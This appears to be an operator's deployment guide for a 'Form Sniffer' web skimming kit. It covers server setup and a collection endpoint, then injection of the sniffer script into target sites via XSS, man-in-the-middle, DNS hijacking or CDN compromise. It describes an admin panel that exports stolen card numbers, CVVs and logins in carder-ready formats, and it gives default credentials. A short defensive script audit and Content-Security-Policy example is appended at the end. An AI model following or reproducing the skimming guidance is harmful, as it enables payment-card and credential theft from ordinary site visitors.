╔══════════════════════════════════════════════════════════════════════╗ ║ FORM SNIFFER - DEPLOYMENT & USAGE GUIDE ║ ║ Version 2.0 ║ ╚══════════════════════════════════════════════════════════════════════╝ ═══════════════════════════════════════════════════════════════════════ TABLE OF CONTENTS ═══════════════════════════════════════════════════════════════════════ 1. Requirements 2. Installation Steps 3. Configuration 4. Deploying the Sniffer 5. Using the Admin Panel 6. Data Extraction 7. Troubleshooting 8. Security Best Practices ═══════════════════════════════════════════════════════════════════════ 1. REQUIREMENTS ═══════════════════════════════════════════════════════════════════════ Server Requirements: ✓ PHP 7.4 or higher ✓ MySQL 5.7 or higher (or MariaDB 10.2+) ✓ Apache/Nginx web server ✓ SSL Certificate (HTTPS recommended) ✓ PHP Extensions: PDO, PDO_MySQL, JSON, OpenSSL Recommended: • 1GB+ RAM • 10GB+ disk space • CentOS 7+, Ubuntu 18.04+, or similar ═══════════════════════════════════════════════════════════════════════ 2. INSTALLATION STEPS ═══════════════════════════════════════════════════════════════════════ STEP 1: Upload Files ─────────────────────────────────────────────────────────────────────── Upload all files to your web server: /var/www/html/sniffer/ (or your web root) Files to upload: • admin.php • collect.php • config.php • config_loader.php • login.php • logout.php • export.php • sniffer.js • style.css • database.sql • .env.example • /api/ folder (all files) STEP 2: Create Database ─────────────────────────────────────────────────────────────────────── Method A: Using MySQL Command Line 1. Login to MySQL: mysql -u root -p 2. Import the database: source /path/to/database.sql Method B: Using phpMyAdmin 1. Open phpMyAdmin 2. Click "Import" 3. Choose database.sql file 4. Click "Go" Method C: Manual Command mysql -u root -p < database.sql STEP 3: Configure Environment ─────────────────────────────────────────────────────────────────────── 1. 
Copy .env.example to .env: cp .env.example .env 2. Edit .env file: nano .env 3. Update these settings: # Database Configuration (REQUIRED) DB_HOST=localhost DB_NAME=form_sniffer DB_USER=your_database_username DB_PASS=your_database_password # Application URL (REQUIRED) BASE_URL=https://yourdomain.com # Security (Optional but recommended) APP_DEBUG=false RATE_LIMIT_REQUESTS=100 4. Save and close (Ctrl+X, Y, Enter) STEP 4: Set File Permissions ─────────────────────────────────────────────────────────────────────── chmod 755 /var/www/html/sniffer/ chmod 644 /var/www/html/sniffer/*.php chmod 644 /var/www/html/sniffer/*.js chmod 644 /var/www/html/sniffer/*.css chmod 600 /var/www/html/sniffer/.env mkdir /var/www/html/sniffer/logs chmod 755 /var/www/html/sniffer/logs STEP 5: Configure Sniffer JavaScript ─────────────────────────────────────────────────────────────────────── Edit sniffer.js: const CONFIG = { endpoint: 'https://yourdomain.com/collect.php', // ← Change this! timeout: 5000, retries: 2, }; Save the file. STEP 6: Test Installation ─────────────────────────────────────────────────────────────────────── 1. Open browser: https://yourdomain.com/admin.php 2. Should redirect to login page 3. Login with: Username: admin Password: Kontolodon123@ 4. If you see the dashboard, installation is complete! STEP 7: Change Default Password (IMPORTANT!) ─────────────────────────────────────────────────────────────────────── 1. Login to admin panel 2. Click user avatar (top right) 3. Click "Change Password" 4. Enter new secure password 5. Save changes ═══════════════════════════════════════════════════════════════════════ 3. 
CONFIGURATION ═══════════════════════════════════════════════════════════════════════ All configuration is done in .env file: DATABASE SETTINGS: ────────────────── DB_HOST=localhost # Database server DB_PORT=3306 # MySQL port (default: 3306) DB_NAME=form_sniffer # Database name DB_USER=root # Database username DB_PASS= # Database password SECURITY SETTINGS: ────────────────── SESSION_LIFETIME=3600 # Session timeout (1 hour) RATE_LIMIT_REQUESTS=100 # Max requests per hour per IP MAX_DATA_SIZE=1048576 # Max payload size (1MB) APPLICATION SETTINGS: ───────────────────── APP_ENV=production # Environment (production/development) APP_DEBUG=false # Debug mode (false for production) BASE_URL=https://yourdomain.com FEATURE FLAGS: ────────────── ENABLE_EXPORT=true # Allow data export ENABLE_BULK_OPERATIONS=true # Allow bulk actions ═══════════════════════════════════════════════════════════════════════ 4. DEPLOYING THE SNIFFER ═══════════════════════════════════════════════════════════════════════ METHOD 1: Direct Script Injection ─────────────────────────────────────────────────────────────────────── Inject into target website's HTML: Best places to inject: • Before tag • After tag • In footer template • Via browser extension METHOD 2: XSS Vulnerability ─────────────────────────────────────────────────────────────────────── If target has XSS vulnerability: METHOD 3: Man-in-the-Middle ─────────────────────────────────────────────────────────────────────── Use proxy/interceptor to inject script into HTTP traffic. METHOD 4: DNS Hijacking ─────────────────────────────────────────────────────────────────────── Modify DNS to serve malicious content with injected script. METHOD 5: CDN Compromise ─────────────────────────────────────────────────────────────────────── If you control a CDN or library they use, inject there. 
VERIFICATION: ───────────── After injection, open browser console (F12) on target site: • Should see: FormTracker object in console • Test by submitting a form • Check admin panel for captured data ═══════════════════════════════════════════════════════════════════════ 5. USING THE ADMIN PANEL ═══════════════════════════════════════════════════════════════════════ DASHBOARD OVERVIEW: ─────────────────────────────────────────────────────────────────────── ┌─────────────────────────────────────────────────────────────────────┐ │ Statistics Cards: │ │ • Today's Submissions - Number of captures today │ │ • This Week - Last 7 days │ │ • Unique Pages - Different URLs captured │ │ • Unique Visitors - Different IP addresses │ └─────────────────────────────────────────────────────────────────────┘ SEARCH & FILTER: ─────────────────────────────────────────────────────────────────────── 1. Search Box: • Search by URL, email, or any field • Real-time search (types as you go) 2. Page Filter: • Filter by specific website/page • Shows top 5 captured pages 3. Date Range: • Filter by date range • Select start and end date 4. Click "Apply Filters" to search VIEWING SUBMISSIONS: ─────────────────────────────────────────────────────────────────────── Each row shows: • ID - Unique submission number • Page URL - Where form was submitted • Form Data - Preview of captured fields • Device - Desktop/Mobile/Tablet + Browser • Location - IP, Country, City • Time - When captured ACTIONS PER ROW: ─────────────────────────────────────────────────────────────────────── 👁 View - Full details modal 📋 Copy - Quick copy to clipboard (smart format) 🗑 Delete - Remove submission ═══════════════════════════════════════════════════════════════════════ 6. DATA EXTRACTION ═══════════════════════════════════════════════════════════════════════ SINGLE ITEM EXTRACTION: ─────────────────────────────────────────────────────────────────────── 1. Click 📋 Copy button next to any row 2. 
Data is auto-formatted based on type: • Credit Cards: 4532123456789010|12|2027|123 • Login Credentials: user@email.com:password123 • Other Data: JSON format BULK EXTRACTION: ─────────────────────────────────────────────────────────────────────── 1. Check boxes next to items you want 2. OR click checkbox in header to select all 3. Use bulk action buttons: [Copy Selected] - Copy all to clipboard [Export CSV] - Download as CSV [Export JSON] - Download as JSON [Delete Selected] - Remove selected EXPORT FORMATS: ─────────────────────────────────────────────────────────────────────── CSV Format: ─────────── ID,Date,Card_Number,Expiry,CVV,Email,Password,IP,Country 1,2026-02-16,4532123456789010,12/2027,123,user@email.com,pass123,192.168.1.1,US JSON Format: ──────────── [{ "id": 1, "card_number": "4532123456789010", "expiry": "12/2027", "cvv": "123", "email": "user@email.com", "captured_at": "2026-02-16 20:15:45" }] QUICK COPY FORMATS: ─────────────────────────────────────────────────────────────────────── The system auto-detects data type: Credit Card → 4532123456789010|12|2027|123|John Doe Login → user@email.com:password123 Generic → Full JSON ═══════════════════════════════════════════════════════════════════════ 7. 
TROUBLESHOOTING ═══════════════════════════════════════════════════════════════════════ PROBLEM: "Database connection failed" SOLUTION: • Check .env file exists • Verify DB credentials in .env • Ensure MySQL is running • Test: mysql -u username -p database_name PROBLEM: "No data appearing in dashboard" SOLUTION: • Check collect.php is accessible • Verify sniffer.js endpoint URL is correct • Check browser console for JavaScript errors • Test: curl -X POST https://yourdomain.com/collect.php PROBLEM: "404 Not Found on admin.php" SOLUTION: • Verify files uploaded correctly • Check file permissions (chmod 644) • Verify web server configuration PROBLEM: "Rate limit exceeded" SOLUTION: • Increase RATE_LIMIT_REQUESTS in .env • Clear rate_limits table: TRUNCATE TABLE rate_limits; PROBLEM: "Can't login to admin panel" SOLUTION: • Default credentials: admin/Kontolodon123@ • Reset password in database: UPDATE users SET password='$2y$10$QupuOffI9tWrJOltUu4EP.2/bYJT5vjNSECuxeews/.6DbxxPm5E2' WHERE username='admin'; • Password will be: Kontolodon123@ PROBLEM: "Sniffer not capturing forms" SOLUTION: • Check sniffer.js is loading (Network tab in browser) • Verify endpoint URL in sniffer.js • Check CORS settings • Ensure target site doesn't block the script PROBLEM: "Permission denied errors" SOLUTION: • Fix file permissions: chmod 755 /var/www/html/sniffer/ chmod 644 *.php *.js *.css chmod 600 .env mkdir logs && chmod 755 logs ═══════════════════════════════════════════════════════════════════════ 8. 
SECURITY BEST PRACTICES ═══════════════════════════════════════════════════════════════════════ ESSENTIAL SECURITY: ─────────────────────────────────────────────────────────────────────── ✓ Change default admin password immediately ✓ Use HTTPS (SSL certificate required) ✓ Restrict admin panel access by IP ✓ Use strong database passwords ✓ Keep .env file secure (chmod 600) ✓ Regular backups ✓ Monitor access logs RECOMMENDED SECURITY: ─────────────────────────────────────────────────────────────────────── • Rename admin.php to something obscure (e.g., x47f9a.php) • Use VPN for admin access • Enable 2FA if possible • Regularly update PHP and MySQL • Use fail2ban to block brute force • Implement IP whitelist • Regular security audits HIDE ADMIN PANEL: ─────────────────────────────────────────────────────────────────────── 1. Rename admin.php: mv admin.php secret_dashboard_xyz.php 2. Update login.php redirect 3. Bookmark new URL 4. Don't share the URL IP WHITELIST (.htaccess): ─────────────────────────────────────────────────────────────────────── Create .htaccess in admin directory: Order Deny,Allow Deny from all Allow from YOUR.IP.ADDRESS.HERE Allow from 203.0.113.0/24 DATABASE SECURITY: ─────────────────────────────────────────────────────────────────────── • Use separate database user (not root) • Grant only necessary privileges • Use strong passwords (20+ chars) • Bind MySQL to localhost only • Disable remote MySQL access DATA RETENTION: ─────────────────────────────────────────────────────────────────────── Clean old data regularly: DELETE FROM form_submissions WHERE created_at < DATE_SUB(NOW(), INTERVAL 90 DAY); Or use stored procedure: CALL sp_cleanup_old_data(90); ═══════════════════════════════════════════════════════════════════════ QUICK REFERENCE COMMANDS ═══════════════════════════════════════════════════════════════════════ Import Database: mysql -u root -p < database.sql Copy .env: cp .env.example .env Set Permissions: chmod 600 .env chmod 755 logs View 
Logs: tail -f logs/app.log Clean Old Data: mysql -u username -p database_name -e "CALL sp_cleanup_old_data(90);" Backup Database: mysqldump -u username -p form_sniffer > backup_$(date +%Y%m%d).sql Restore Database: mysql -u username -p form_sniffer < backup_20260216.sql ═══════════════════════════════════════════════════════════════════════ SUPPORT & UPDATES ═══════════════════════════════════════════════════════════════════════ For authorized D1337 SOVEREIGN LABS personnel only. Version: 2.0.0 Last Updated: February 16, 2026 ═══════════════════════════════════════════════════════════════════════
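
Seen from the site owner's side, every deployment method in section 4 ends the same way: a script element the site did not ship, and a POST of form data to a foreign collection endpoint. The block below is an added defensive example, not part of the original guide or its kit. It audits a page's script tags against an allowlist and builds a Content-Security-Policy that blocks both the foreign script load and the exfiltration request. The origins, sample HTML and function names are constructed assumptions, and inline scripts are flagged because the policy shown does not permit them.

```javascript
'use strict';
// Added defensive example: all origins, names and the sample page are constructed.
const SITE_ORIGIN = 'https://shop.example';                 // assumed first-party origin
const ALLOWED_SCRIPT_ORIGINS = new Set([SITE_ORIGIN, 'https://cdn.example']);

const SAMPLE_HTML = `
<script src="/assets/app.js"></script>
<script src="https://cdn.example/lib.js"></script>
<script src="https://cdn.example/ui.js" integrity="sha384-CONSTRUCTED" crossorigin="anonymous"></script>
<script src="//metrics.invalid/t.js"></script>
<script>document.forms[0].addEventListener('submit', hook)</script>`;

// Pull every <script> element (src, SRI presence, inline body) out of an HTML string.
function extractScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = (/\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]) || [])[1] || null;
    const integrity = /\bintegrity\s*=\s*["']?sha(256|384|512)-/i.test(m[1]);
    out.push({ src, integrity, inline: m[2].trim() });
  }
  return out;
}

// Report scripts that an injected skimmer would add or that lack integrity pinning.
function auditScripts(html, allowed = ALLOWED_SCRIPT_ORIGINS, base = SITE_ORIGIN) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src === null) {
      if (s.inline) findings.push({ rule: 'inline-script', detail: s.inline.slice(0, 40) });
      continue;
    }
    let origin;
    try { origin = new URL(s.src, base).origin; }   // resolves relative and // URLs
    catch { findings.push({ rule: 'unparseable-src', detail: s.src }); continue; }
    if (!allowed.has(origin)) findings.push({ rule: 'unlisted-origin', detail: origin });
    else if (origin !== base && !s.integrity) findings.push({ rule: 'missing-sri', detail: s.src });
  }
  return findings;
}

// Policy: scripts only from the allowlist, and form data may only be sent first-party.
function buildCsp(allowed = ALLOWED_SCRIPT_ORIGINS, base = SITE_ORIGIN) {
  const thirdParty = [...allowed].filter((o) => o !== base).join(' ');
  return `default-src 'self'; script-src 'self' ${thirdParty}; connect-src 'self'; form-action 'self'`;
}
```

Run the audit against rendered checkout pages on a schedule and alert on any new finding; serve the policy first as Content-Security-Policy-Report-Only to collect violations before enforcing it.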